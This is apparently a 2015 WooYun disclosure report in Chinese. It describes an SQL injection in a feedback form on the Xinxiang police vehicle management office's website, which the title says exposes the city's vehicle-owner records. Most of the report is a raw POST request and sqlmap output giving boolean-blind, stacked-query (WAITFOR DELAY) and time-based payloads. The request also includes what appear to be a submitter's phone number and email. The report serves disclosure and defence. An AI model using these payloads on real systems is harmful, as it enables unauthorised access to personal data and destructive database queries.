新乡市公安局车辆管理所某处SQL注入（目测全市车主信息）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0150710

漏洞标题：新乡市公安局车辆管理所某处SQL注入（目测全市车主信息）

漏洞作者：路人甲

提交时间：2015-10-31 10:57

修复时间：2015-12-18 09:20

公开时间：2015-12-18 09:20

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(公安部一所)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-10-31：细节已通知厂商并且等待厂商处理中
2015-11-03：厂商已经确认，细节仅向厂商公开
2015-11-13：细节向核心白帽子及相关领域专家公开
2015-11-23：细节向普通白帽子公开
2015-12-03：细节向实习白帽子公开
2015-12-18：细节向公众公开

简要描述：

新乡市公安局车辆管理所某处SQL注入

详细说明：

http://**.**.**.**/addQuestion.aspx

提交处

POST /addQuestion.aspx HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:41.0) Gecko/20100101 Firefox/41.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://**.**.**.**/addQuestion.aspx
Cookie: CNZZDATA4639901=cnzz_eid%3D319043224-1444190633-http%253A%252F%252F**.**.**.**%252F%26ntime%3D1446195445; ASP.NET_SessionId=w14shfej240auwauczi0akru
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 4269
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwULLTE4MjU3Njg2NjgPZBYCAgMPZBYKAgUPZBYGAgEPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIGZBYMZg9kFgJmDxUDAzI3NR7mlK%2FpmJ%2FovabnrqHmiYDotbDov5vnm7Tmkq3pl7Qe5pSv6Zif6L2m566h5omA6LWw6L%2Bb55u05pKt6Ze0ZAIBD2QWAmYPFQMDMjcyVOaUr%2BmYn%2Be7hOe7h%2BWPrOW8gOWFqOW4gua2suS9k%2BWNsemZqei0p%2BeJqee9kOi9pue0p%2BaApeWIh%2BaWreijhee9ruS9v%2BeUqOWfueiureS8muiuriHmlK%2FpmJ%2Fnu4Tnu4flj6zlvIDlhajluILmtrLkvZMuLi5kAgIPZBYCZg8VAwMyNzAz55yB5pS%2F5Y2P5a2U546J6Iqz5LiA6KGM6LCD56CU57uE6I6F5Li05oiR5biC6LCD56CUIeecgeaUv%2BWNj%2BWtlOeOieiKs%2BS4gOihjOiwg%2BeglC4uLmQCAw9kFgJmDxUDAzI1NkXkuqTpgJrnrqHnkIbmlK%2FpmJ%2FovabnrqHmiYDliJvmlrDkvr%2FmsJHkuL7mjqrliY3np7vmlrDovabmn6Xpqozlt6XkvZwh5Lqk6YCa566h55CG5pSv6Zif6L2m566h5omA5YibLi4uZAIED2QWAmYPFQMDMjU1WuaWsOS5oeaUr%2BmYn%2Bi9pueuoeaJgOe7hOe7h%2Bingueci%2BOAiuS9nOmjjuW7uuiuvuawuOi%2FnOWcqOi3r%2BS4iuOAi%2BW8uuWMluawkeitpuaAneaDs%2BaVmeiCsiHmlrDkuaHmlK%2FpmJ%2FovabnrqHmiYDnu4Tnu4fop4IuLi5kAgUPZBYCZg8VAwMyNDdA5paw5Lmh5pSv6Zif57uE57uH5byA5bGV5YWo5biC5py65Yqo6L2mIOafpemqjOWRmOi1hOagvOWfueiureePrSHmlrDkuaHmlK%2FpmJ%2Fnu4Tnu4flvIDlsZXlhajluIIuLi5kAgMPPCsACQEADxYEHwAWAB8BAgZkFgxmD2QWAmYPFQMDMjc4LOacuuWKqOi9pueJjOivgeWFrOWRiuS9nOW6n18yMDE1MDkzMC0x5L%2Bh5oGvH%2BacuuWKqOi9pueJjOivgeWFrOWRiuS9nOW6n18uLi5kAgEPZBYCZg8VAwMyNzck5py65Yqo6L2m54mM6K%2BB5YWs5ZGK5L2c5bqfXzIwMTUwOTMwH%2BacuuWKqOi9pueJjOivgeWFrOWRiuS9nOW6n18uLi5kAgIPZBYCZg8VAwMyNzYg6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hMjAxNTEwMDgd6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hMjAuLi5kAgMPZBYCZg8VAwMyNzQg6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hMjAxNTA5MDId6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hMjAuLi5kAgQPZBYCZg8VAwMyNzEh6am%2B5qCh5Z%2B56K6t6LSo6YeP57uf6K6hLTIwMTUwODAzHempvuagoeWfueiurei0qOmHj%2Be7n%2BiuoS0yLi4uZAIFD2QWAmYPFQMDMjY5IOmpvuagoeWfueiurei0qOmHj%2Be7n%2BiuoTIwMTUwNzA2HempvuagoeWfueiurei0qOmHj%2Be7n%2BiuoTIwLi4uZAIFDzwrAAkBAA8WBB8AFgAfAQIGZBYMZg9kFgJmDxUDAzI0MA%2Fpu4TmoIfovablrprkuYkP6buE5qCH6L2m5a6a5LmJZAIBD2QWAmYPFQMDMTg5M%2Bays%2BWNl%2BecgeWunuaWveOAiOagoei9puWuieWFqOeuoeeQhuadoeS%2Bi%2BOAieWKnuazlSHmsrPljZfnnIHlrp7mlr3jgIjmoKHovablronlhaguLi5kAgIPZBYCZg8VAwMxMjg85YWz5LqO5Yqg5by65aSW5Zyw6L2s5YWl5py65Yqo6L2m5o6S5rCU5rGh5p%2BT566h55CG55qE6YCa55%2BlIeWFs%2BS6juWKoOW8uuWkluWcsOi9rOWFpeacuuWKqC4uLmQCAw9kFgJmDxUDAzEyNSHmnLrliqjovablvLrliLbmiqXlup%2FmoIflh4bop4Tlrpoh5py65Yqo6L2m5by65Yi25oql5bqf5qCH5YeG6KeELi4uZAIED2QWAmYPFQMDMTAxSOOAiuacuuWKqOi9pumpvumptuivgeeUs%2BmihuWSjOS9v%2BeUqOinhOWumuOAi%2B%2B8iOWFrOWuiemDqOS7pOesrDEyM%2BWPt%2B%2B8iSHjgIrmnLrliqjovabpqb7pqbbor4HnlLPpooblkowuLi5kAgUPZBYCZg8VAwMxMDBW44CK5YWs5a6J6YOo5YWz5LqO5L%2Bu5pS5POacuuWKqOi9pueZu%2BiusOinhOWumj7nmoTlhrPlrprjgIvvvIjlhazlronpg6jku6TnrKwxMjTlj7fvvIkf44CK5YWs5a6J6YOo5YWz5LqO5L%2Bu5pS5POacui4uLmQCBw8QZA8WA2YCAQICFgMQBRLpl67nrZTmnI3liqHlkqjor6IFATZnEAUV6am%2B6am25ZGY5bi46KeB6Zeu6aKYBQE3ZxAFFeacuuWKqOi9puW4uOingemXrumimAUBOGdkZAINDw8WAh4EVGV4dAUJeHh4eHh4eHh4ZGQCEQ9kFgJmD2QWAgIBDzwrAA0BAA8WBB4LXyFEYXRhQm91bmRnHwECAmQWAmYPZBYKZg8PFgIeB1Zpc2libGVoZGQCAQ9kFghmD2QWAmYPFQIFMjYzMTYJeHh4eHh4eHh4ZAIBD2QWAmYPFQEM5pqC5peg5Zue562UZAICD2QWAmYPFQEBMWQCAw9kFgJmDxUBCjIwMTUtMTAtMzBkAgIPZBYIZg9kFgJmDxUCBTI2MDEyCXh4eHh4eHh4eGQCAQ9kFgJmDxUBCeW3suWbnuetlGQCAg9kFgJmDxUBAjg0ZAIDD2QWAmYPFQEJMjAxNS0xMC03ZAIDDw8WAh8EaGRkAgQPDxYCHwRoZGQCHQ9kFgJmDzwrAAkBAA8WBB8AFgAfAQIHZBYOZg9kFgJmDxUCG2h0dHA6Ly93d3cueGlueGlhbmcuZ292LmNuLxXmlrDkuaHluILkurrmsJHmlL%2FlupxkAgEPZBYCZg8VAhdodHRwOi8vd3d3Lnh4enguZ292LmNuLw%2FmlrDkuaHluILmlL%2FljY9kAgIPZBYCZg8VAhdodHRwOi8vd3d3Lnh4ZG9uZ2xpLmNvbQzmlrDosLfliqjliptkAgMPZBYCZg8VAhhodHRwOi8vd3d3Lnh4Z2F3Lmdvdi5jbi8P5paw5Lmh5YWs5a6J572RZAIED2QWAmYPFQInaHR0cDovL2thb3NoaS5qeGVkdC5jb20vemhlbmd6aG91a3MuYXNwHOmpvumptuWRmOeQhuiuuuaooeaLn%2BiAg%2BivlSBkAgUPZBYCZg8VAhdodHRwOi8vd3d3LjE2ODhxY3cuY29tLw%2FmlrDkuaHmsb3ovabnvZFkAgYPZBYCZg8VAhVodHRwOi8vd3d3Lnh4YmFuZy5uZXQM6L2m6am%2B5bCP5biuZBgBBQlHcmlkVmlldzEPPCsACgEIAgFkLYOOTnJAVXpFu5Mi1FmJJXvp7p0%3D&__EVENTVALIDATION=%2FwEWCgKuzoCVAgKXi6WLBgKUi6WLBgKFi6WLBgKbzqrYDQLNzvrlCAKK0KrrCgKjsreHDwLs0bLrBgKM54rGBplpFbtCPwifMPR3ycY1E3%2Frn7Os&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx&Tel=15181869462&E_mail=1521073798%**.**.**.**&TextBox1=%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C%E8%A1%8C&Button1=%E6%8F%90+%E4%BA%A4

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: biaoti (POST)
    Type: boolean-based blind
    Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries (IF)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE4MjU3Njg2NjgPZBYCAg
MPZBYKAgUPZBYGAgEPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIGZBYMZg9kFgJmDxUDAzI3NR7mlK/pmJ/ova
bnrqHmiYDotbDov5vnm7Tmkq3pl7Qe5pSv6Zif6L2m566h5omA6LWw6L b55u05pKt6Ze0ZAIBD2QWAmYPFQMDMjcyVOaUr mYn
e7hOe7h WPrOW8gOWFqOW4gua2suS9k WNsemZqei0p eJqee9kOi9pue0p aApeWIh aWreijhee9ruS9v eUqOWfueiureS8mu
iuriHmlK/pmJ/nu4Tnu4flj6zlvIDlhajluILmtrLkvZMuLi5kAgIPZBYCZg8VAwMyNzAz55yB5pS/5Y2P5a2U546J6Iqz5LiA6K
GM6LCD56CU57uE6I6F5Li05oiR5biC6LCD56CUIeecgeaUv WNj WtlOeOieiKs S4gOihjOiwg eglC4uLmQCAw9kFgJmDxUDAz
I1NkXkuqTpgJrnrqHnkIbmlK/pmJ/ovabnrqHmiYDliJvmlrDkvr/msJHkuL7mjqrliY3np7vmlrDovabmn6Xpqozlt6XkvZwh5L
qk6YCa566h55CG5pSv6Zif6L2m566h5omA5YibLi4uZAIED2QWAmYPFQMDMjU1WuaWsOS5oeaUr mYn i9pueuoeaJgOe7hOe7h
ingueci OAiuS9nOmjjuW7uuiuvuawuOi/nOWcqOi3r S4iuOAi W8uuWMluawkeitpuaAneaDs aVmeiCsiHmlrDkuaHmlK/pmJ
/ovabnrqHmiYDnu4Tnu4fop4IuLi5kAgUPZBYCZg8VAwMyNDdA5paw5Lmh5pSv6Zif57uE57uH5byA5bGV5YWo5biC5py65Yqo6L
2mIOafpemqjOWRmOi1hOagvOWfueiureePrSHmlrDkuaHmlK/pmJ/nu4Tnu4flvIDlsZXlhajluIIuLi5kAgMPPCsACQEADxYEHw
AWAB8BAgZkFgxmD2QWAmYPFQMDMjc0IOmpvuagoeWfueiurei0qOmHj e7n iuoTIwMTUwOTAyHempvuagoeWfueiurei0qOmHj
e7n iuoTIwLi4uZAIBD2QWAmYPFQMDMjcxIempvuagoeWfueiurei0qOmHj e7n iuoS0yMDE1MDgwMx3pqb7moKHln7norq3otK
jph4/nu5/orqEtMi4uLmQCAg9kFgJmDxUDAzI2OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDcwNh3pqb7moKHln7norq
3otKjph4/nu5/orqEyMC4uLmQCAw9kFgJmDxUDAzI2MyDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDYwMR3pqb7moKHln7
norq3otKjph4/nu5/orqEyMC4uLmQCBA9kFgJmDxUDAzI2MCDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDUwNB3pqb7moK
Hln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ9kFgJmDxUDAzI1OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDQwMR3pqb
7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ88KwAJAQAPFgQfABYAHwECBmQWDGYPZBYCZg8VAwMyNDAP6buE5qCH6L2m5a
6a5LmJD m7hOagh i9puWumuS5iWQCAQ9kFgJmDxUDAzE4OTPmsrPljZfnnIHlrp7mlr3jgIjmoKHovablronlhajnrqHnkIbmna
HkvovjgInlip7ms5Uh5rKz5Y2X55yB5a6e5pa944CI5qCh6L2m5a6J5YWoLi4uZAICD2QWAmYPFQMDMTI4POWFs S6juWKoOW8uu
WkluWcsOi9rOWFpeacuuWKqOi9puaOkuawlOaxoeafk euoeeQhueahOmAmuefpSHlhbPkuo7liqDlvLrlpJblnLDovazlhaXmnL
rliqguLi5kAgMPZBYCZg8VAwMxMjUh5py65Yqo6L2m5by65Yi25oql5bqf5qCH5YeG6KeE5a6aIeacuuWKqOi9puW8uuWItuaKpe
W6n agh WHhuinhC4uLmQCBA9kFgJmDxUDAzEwMUjjgIrmnLrliqjovabpqb7pqbbor4HnlLPpooblkozkvb/nlKjop4TlrprjgI
vvvIjlhazlronpg6jku6TnrKwxMjPlj7fvvIkh44CK5py65Yqo6L2m6am 6am26K B55Sz6aKG5ZKMLi4uZAIFD2QWAmYPFQMDMT
AwVuOAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLrliqjovabnmbvorrDop4Tlrpo 55qE5Yaz5a6a44CL77yI5YWs5a6J6YOo5L
uk56ysMTI05Y 377yJH OAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLouLi5kAgcPEGQPFgNmAgECAhYDEAUS6Zeu562U5pyN5Y
qh5ZKo6K iBQE2ZxAFFempvumptuWRmOW4uOingemXrumimAUBN2cQBRXmnLrliqjovabluLjop4Hpl67popgFAThnZGQCDQ8PFg
IeBFRleHQFCXh4eHh4eHh4eGRkAhEPZBYCZg9kFgICAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx8BZmRkAh0PZBYCZg88KwAJAQ
APFgQfABYAHwECB2QWDmYPZBYCZg8VAhtodHRwOi8vd3d3LnhpbnhpYW5nLmdvdi5jbi8V5paw5Lmh5biC5Lq65rCR5pS/5bqcZA
IBD2QWAmYPFQIXaHR0cDovL3d3dy54eHp4Lmdvdi5jbi8P5paw5Lmh5biC5pS/5Y2PZAICD2QWAmYPFQIXaHR0cDovL3d3dy54eG
RvbmdsaS5jb20M5paw6LC35Yqo5YqbZAIDD2QWAmYPFQIYaHR0cDovL3d3dy54eGdhdy5nb3YuY24vD aWsOS5oeWFrOWuiee9kW
QCBA9kFgJmDxUCJ2h0dHA6Ly9rYW9zaGkuanhlZHQuY29tL3poZW5nemhvdWtzLmFzcBzpqb7pqbblkZjnkIborrrmqKHmi5/ogI
Por5UgZAIFD2QWAmYPFQIXaHR0cDovL3d3dy4xNjg4cWN3LmNvbS8P5paw5Lmh5rG96L2m572RZAIGD2QWAmYPFQIVaHR0cDovL3
d3dy54eGJhbmcubmV0DOi9pumpvuWwj W4rmQYAQUJR3JpZFZpZXcxDzwrAAoBCGZkbtTA8ZhUrZWQqhtoPzaRsvSHBFU=&__EVE
NTVALIDATION=/wEWCgKNyaqCDwKXi6WLBgKUi6WLBgKFi6WLBgKbzqrYDQLNzvrlCAKK0KrrCgKjsreHDwLs0bLrBgKM54rGBla
nAJ6I5XMeTBnghy66ZPsq1Szk&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx';IF(1785=1785
) SELECT 1785 ELSE DROP FUNCTION Oqyz--&Tel=15181869462&E_mail=1521073798@**.**.**.**&TextBox1=xxxxxxxxxx
xxxxxxxxxx&Button1=%E6%8F%90 %E4%BA%A4
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE4MjU3Njg2NjgPZBYCAg
MPZBYKAgUPZBYGAgEPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIGZBYMZg9kFgJmDxUDAzI3NR7mlK/pmJ/ova
bnrqHmiYDotbDov5vnm7Tmkq3pl7Qe5pSv6Zif6L2m566h5omA6LWw6L b55u05pKt6Ze0ZAIBD2QWAmYPFQMDMjcyVOaUr mYn
e7hOe7h WPrOW8gOWFqOW4gua2suS9k WNsemZqei0p eJqee9kOi9pue0p aApeWIh aWreijhee9ruS9v eUqOWfueiureS8mu
iuriHmlK/pmJ/nu4Tnu4flj6zlvIDlhajluILmtrLkvZMuLi5kAgIPZBYCZg8VAwMyNzAz55yB5pS/5Y2P5a2U546J6Iqz5LiA6K
GM6LCD56CU57uE6I6F5Li05oiR5biC6LCD56CUIeecgeaUv WNj WtlOeOieiKs S4gOihjOiwg eglC4uLmQCAw9kFgJmDxUDAz
I1NkXkuqTpgJrnrqHnkIbmlK/pmJ/ovabnrqHmiYDliJvmlrDkvr/msJHkuL7mjqrliY3np7vmlrDovabmn6Xpqozlt6XkvZwh5L
qk6YCa566h55CG5pSv6Zif6L2m566h5omA5YibLi4uZAIED2QWAmYPFQMDMjU1WuaWsOS5oeaUr mYn i9pueuoeaJgOe7hOe7h
ingueci OAiuS9nOmjjuW7uuiuvuawuOi/nOWcqOi3r S4iuOAi W8uuWMluawkeitpuaAneaDs aVmeiCsiHmlrDkuaHmlK/pmJ
/ovabnrqHmiYDnu4Tnu4fop4IuLi5kAgUPZBYCZg8VAwMyNDdA5paw5Lmh5pSv6Zif57uE57uH5byA5bGV5YWo5biC5py65Yqo6L
2mIOafpemqjOWRmOi1hOagvOWfueiureePrSHmlrDkuaHmlK/pmJ/nu4Tnu4flvIDlsZXlhajluIIuLi5kAgMPPCsACQEADxYEHw
AWAB8BAgZkFgxmD2QWAmYPFQMDMjc0IOmpvuagoeWfueiurei0qOmHj e7n iuoTIwMTUwOTAyHempvuagoeWfueiurei0qOmHj
e7n iuoTIwLi4uZAIBD2QWAmYPFQMDMjcxIempvuagoeWfueiurei0qOmHj e7n iuoS0yMDE1MDgwMx3pqb7moKHln7norq3otK
jph4/nu5/orqEtMi4uLmQCAg9kFgJmDxUDAzI2OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDcwNh3pqb7moKHln7norq
3otKjph4/nu5/orqEyMC4uLmQCAw9kFgJmDxUDAzI2MyDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDYwMR3pqb7moKHln7
norq3otKjph4/nu5/orqEyMC4uLmQCBA9kFgJmDxUDAzI2MCDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDUwNB3pqb7moK
Hln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ9kFgJmDxUDAzI1OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDQwMR3pqb
7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ88KwAJAQAPFgQfABYAHwECBmQWDGYPZBYCZg8VAwMyNDAP6buE5qCH6L2m5a
6a5LmJD m7hOagh i9puWumuS5iWQCAQ9kFgJmDxUDAzE4OTPmsrPljZfnnIHlrp7mlr3jgIjmoKHovablronlhajnrqHnkIbmna
HkvovjgInlip7ms5Uh5rKz5Y2X55yB5a6e5pa944CI5qCh6L2m5a6J5YWoLi4uZAICD2QWAmYPFQMDMTI4POWFs S6juWKoOW8uu
WkluWcsOi9rOWFpeacuuWKqOi9puaOkuawlOaxoeafk euoeeQhueahOmAmuefpSHlhbPkuo7liqDlvLrlpJblnLDovazlhaXmnL
rliqguLi5kAgMPZBYCZg8VAwMxMjUh5py65Yqo6L2m5by65Yi25oql5bqf5qCH5YeG6KeE5a6aIeacuuWKqOi9puW8uuWItuaKpe
W6n agh WHhuinhC4uLmQCBA9kFgJmDxUDAzEwMUjjgIrmnLrliqjovabpqb7pqbbor4HnlLPpooblkozkvb/nlKjop4TlrprjgI
vvvIjlhazlronpg6jku6TnrKwxMjPlj7fvvIkh44CK5py65Yqo6L2m6am 6am26K B55Sz6aKG5ZKMLi4uZAIFD2QWAmYPFQMDMT
AwVuOAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLrliqjovabnmbvorrDop4Tlrpo 55qE5Yaz5a6a44CL77yI5YWs5a6J6YOo5L
uk56ysMTI05Y 377yJH OAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLouLi5kAgcPEGQPFgNmAgECAhYDEAUS6Zeu562U5pyN5Y
qh5ZKo6K iBQE2ZxAFFempvumptuWRmOW4uOingemXrumimAUBN2cQBRXmnLrliqjovabluLjop4Hpl67popgFAThnZGQCDQ8PFg
IeBFRleHQFCXh4eHh4eHh4eGRkAhEPZBYCZg9kFgICAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx8BZmRkAh0PZBYCZg88KwAJAQ
APFgQfABYAHwECB2QWDmYPZBYCZg8VAhtodHRwOi8vd3d3LnhpbnhpYW5nLmdvdi5jbi8V5paw5Lmh5biC5Lq65rCR5pS/5bqcZA
IBD2QWAmYPFQIXaHR0cDovL3d3dy54eHp4Lmdvdi5jbi8P5paw5Lmh5biC5pS/5Y2PZAICD2QWAmYPFQIXaHR0cDovL3d3dy54eG
RvbmdsaS5jb20M5paw6LC35Yqo5YqbZAIDD2QWAmYPFQIYaHR0cDovL3d3dy54eGdhdy5nb3YuY24vD aWsOS5oeWFrOWuiee9kW
QCBA9kFgJmDxUCJ2h0dHA6Ly9rYW9zaGkuanhlZHQuY29tL3poZW5nemhvdWtzLmFzcBzpqb7pqbblkZjnkIborrrmqKHmi5/ogI
Por5UgZAIFD2QWAmYPFQIXaHR0cDovL3d3dy4xNjg4cWN3LmNvbS8P5paw5Lmh5rG96L2m572RZAIGD2QWAmYPFQIVaHR0cDovL3
d3dy54eGJhbmcubmV0DOi9pumpvuWwj W4rmQYAQUJR3JpZFZpZXcxDzwrAAoBCGZkbtTA8ZhUrZWQqhtoPzaRsvSHBFU=&__EVE
NTVALIDATION=/wEWCgKNyaqCDwKXi6WLBgKUi6WLBgKFi6WLBgKbzqrYDQLNzvrlCAKK0KrrCgKjsreHDwLs0bLrBgKM54rGBla
nAJ6I5XMeTBnghy66ZPsq1Szk&DropDownList1=6&txt_name=%E9%99%88%E6%99%A8&biaoti=xxxxxxxxx';WAITFOR DELA
Y '0:0:5'--&Tel=15181869462&E_mail=1521073798@**.**.**.**&TextBox1=xxxxxxxxxxxxxxxxxxxx&Button1=%E6%8F%90
 %E4%BA%A4
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTE4MjU3Njg2NjgPZBYCAg
MPZBYKAgUPZBYGAgEPPCsACQEADxYEHghEYXRhS2V5cxYAHgtfIUl0ZW1Db3VudAIGZBYMZg9kFgJmDxUDAzI3NR7mlK/pmJ/ova
bnrqHmiYDotbDov5vnm7Tmkq3pl7Qe5pSv6Zif6L2m566h5omA6LWw6L b55u05pKt6Ze0ZAIBD2QWAmYPFQMDMjcyVOaUr mYn
e7hOe7h WPrOW8gOWFqOW4gua2suS9k WNsemZqei0p eJqee9kOi9pue0p aApeWIh aWreijhee9ruS9v eUqOWfueiureS8mu
iuriHmlK/pmJ/nu4Tnu4flj6zlvIDlhajluILmtrLkvZMuLi5kAgIPZBYCZg8VAwMyNzAz55yB5pS/5Y2P5a2U546J6Iqz5LiA6K
GM6LCD56CU57uE6I6F5Li05oiR5biC6LCD56CUIeecgeaUv WNj WtlOeOieiKs S4gOihjOiwg eglC4uLmQCAw9kFgJmDxUDAz
I1NkXkuqTpgJrnrqHnkIbmlK/pmJ/ovabnrqHmiYDliJvmlrDkvr/msJHkuL7mjqrliY3np7vmlrDovabmn6Xpqozlt6XkvZwh5L
qk6YCa566h55CG5pSv6Zif6L2m566h5omA5YibLi4uZAIED2QWAmYPFQMDMjU1WuaWsOS5oeaUr mYn i9pueuoeaJgOe7hOe7h
ingueci OAiuS9nOmjjuW7uuiuvuawuOi/nOWcqOi3r S4iuOAi W8uuWMluawkeitpuaAneaDs aVmeiCsiHmlrDkuaHmlK/pmJ
/ovabnrqHmiYDnu4Tnu4fop4IuLi5kAgUPZBYCZg8VAwMyNDdA5paw5Lmh5pSv6Zif57uE57uH5byA5bGV5YWo5biC5py65Yqo6L
2mIOafpemqjOWRmOi1hOagvOWfueiureePrSHmlrDkuaHmlK/pmJ/nu4Tnu4flvIDlsZXlhajluIIuLi5kAgMPPCsACQEADxYEHw
AWAB8BAgZkFgxmD2QWAmYPFQMDMjc0IOmpvuagoeWfueiurei0qOmHj e7n iuoTIwMTUwOTAyHempvuagoeWfueiurei0qOmHj
e7n iuoTIwLi4uZAIBD2QWAmYPFQMDMjcxIempvuagoeWfueiurei0qOmHj e7n iuoS0yMDE1MDgwMx3pqb7moKHln7norq3otK
jph4/nu5/orqEtMi4uLmQCAg9kFgJmDxUDAzI2OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDcwNh3pqb7moKHln7norq
3otKjph4/nu5/orqEyMC4uLmQCAw9kFgJmDxUDAzI2MyDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDYwMR3pqb7moKHln7
norq3otKjph4/nu5/orqEyMC4uLmQCBA9kFgJmDxUDAzI2MCDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDUwNB3pqb7moK
Hln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ9kFgJmDxUDAzI1OSDpqb7moKHln7norq3otKjph4/nu5/orqEyMDE1MDQwMR3pqb
7moKHln7norq3otKjph4/nu5/orqEyMC4uLmQCBQ88KwAJAQAPFgQfABYAHwECBmQWDGYPZBYCZg8VAwMyNDAP6buE5qCH6L2m5a
6a5LmJD m7hOagh i9puWumuS5iWQCAQ9kFgJmDxUDAzE4OTPmsrPljZfnnIHlrp7mlr3jgIjmoKHovablronlhajnrqHnkIbmna
HkvovjgInlip7ms5Uh5rKz5Y2X55yB5a6e5pa944CI5qCh6L2m5a6J5YWoLi4uZAICD2QWAmYPFQMDMTI4POWFs S6juWKoOW8uu
WkluWcsOi9rOWFpeacuuWKqOi9puaOkuawlOaxoeafk euoeeQhueahOmAmuefpSHlhbPkuo7liqDlvLrlpJblnLDovazlhaXmnL
rliqguLi5kAgMPZBYCZg8VAwMxMjUh5py65Yqo6L2m5by65Yi25oql5bqf5qCH5YeG6KeE5a6aIeacuuWKqOi9puW8uuWItuaKpe
W6n agh WHhuinhC4uLmQCBA9kFgJmDxUDAzEwMUjjgIrmnLrliqjovabpqb7pqbbor4HnlLPpooblkozkvb/nlKjop4TlrprjgI
vvvIjlhazlronpg6jku6TnrKwxMjPlj7fvvIkh44CK5py65Yqo6L2m6am 6am26K B55Sz6aKG5ZKMLi4uZAIFD2QWAmYPFQMDMT
AwVuOAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLrliqjovabnmbvorrDop4Tlrpo 55qE5Yaz5a6a44CL77yI5YWs5a6J6YOo5L
uk56ysMTI05Y 377yJH OAiuWFrOWuiemDqOWFs S6juS/ruaUuTzmnLouLi5kAgcPEGQPFgNmAgECAhYDEAUS6Zeu562U5pyN5Y
qh5ZKo6K iBQE2ZxAFFempvumptuWRmOW4uOingemXrumimAUBN2cQBRXmnLrliqjovabluLjop4Hpl67popgFAThnZGQCDQ8PFg
IeBFRleHQFCXh4eHh4eHh4eGRkAhEPZBYCZg9kFgICAQ88KwANAQAPFgQeC18hRGF0YUJvdW5kZx8BZmRkAh0PZBYCZg88KwAJAQ
APFgQfABYAHwECB2QWDmYPZBYCZg8VAhtodHRwOi8vd3d3LnhpbnhpYW5nLmdvdi5jbi8V5paw5Lmh5biC5Lq65rCR5pS/5bqcZA
IBD2QWAmYPFQIXaHR0cDovL3d3dy54eHp4Lmdvdi5jbi8P5paw5Lmh5biC5pS/5Y2PZAICD2QWAmYPFQIXaHR0cDovL3d3dy54eG
RvbmdsaS5jb20M5paw6LC35Yqo5YqbZAIDD2QWAmYPFQIYaHR0cDovL3d3dy54eGdhdy5nb3YuY24vD aWsOS5oeWFrOWuiee9kW
QCBA9kFgJmDxUCJ2h0dHA6Ly9rYW9zaGkuanhlZHQuY29tL3poZW5nemhvdWtzLmFzcBzpqb7pqbblkZjnkIborrrmqKHmi5/ogI
Por5UgZAIFD2QWAmYPFQIXaHR0cDovL3d3dy4xNjg4cWN3LmNvbS8P5paw5Lmh5rG96L2m572RZAIGD2QWAmYPFQIVaHR0cDovL3
d3dy54eGJhbmcubmV0DOi9pumpvuWwj W4rmQYAQUJR3JpZFZpZXcxDzwrAAoBCGZkbtTA8ZhUrZWQqhtoPzaRsvSHBFU=&__EVE
NTVALIDATION=/wEWCgKNyaqCDwKXi6WLBgKUi6WLBgKFi6WLBgKbzqrYDQLNzvrlCAKK0KrrCgKjsreHDwLs0bLrBgKM54rGBla
